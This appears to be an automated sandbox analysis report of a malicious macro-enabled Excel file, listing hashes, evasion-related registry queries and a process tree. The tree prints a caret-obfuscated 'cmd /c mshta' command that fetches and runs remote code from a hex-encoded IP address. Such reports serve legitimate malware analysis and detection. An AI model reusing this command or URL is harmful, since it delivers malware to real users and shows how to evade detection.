Analysis
-
max time kernel
154s -
max time network
143s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
20-01-2022 07:14
Behavioral task
behavioral1
Sample
a75d803a646fa5cfa41b0489c6de355e62319450b46d41792b4b5b3cd21a0dc3.xlsm
Resource
win10-en-20211208
General
-
Target
a75d803a646fa5cfa41b0489c6de355e62319450b46d41792b4b5b3cd21a0dc3.xlsm
-
Size
115KB
-
MD5
d5b31c6b64e9d8301335eab74bd9962f
-
SHA1
1d2f396131f003ad2e23201b7e2661b5dd3a788b
-
SHA256
a75d803a646fa5cfa41b0489c6de355e62319450b46d41792b4b5b3cd21a0dc3
-
SHA512
f4b100e44b95411bbfb8d1daccbf27dac19cd6cc32ac6341deb5aaebfadf3a12460486c89b07992577bbc030c69df4af55df48c42b36b72299248eb233fba4c1
Malware Config
Extracted
http://0x5cff39c3/sec/se1.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2172 3472 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 43 3612 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3472 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
EXCEL.EXEpid process 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE 3472 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 3472 wrote to memory of 1564 3472 EXCEL.EXE splwow64.exe PID 3472 wrote to memory of 1564 3472 EXCEL.EXE splwow64.exe PID 3472 wrote to memory of 2172 3472 EXCEL.EXE cmd.exe PID 3472 wrote to memory of 2172 3472 EXCEL.EXE cmd.exe PID 2172 wrote to memory of 3612 2172 cmd.exe mshta.exe PID 2172 wrote to memory of 3612 2172 cmd.exe mshta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a75d803a646fa5cfa41b0489c6de355e62319450b46d41792b4b5b3cd21a0dc3.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1564
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/se1.html3⤵
- Blocklisted process makes network request
PID:3612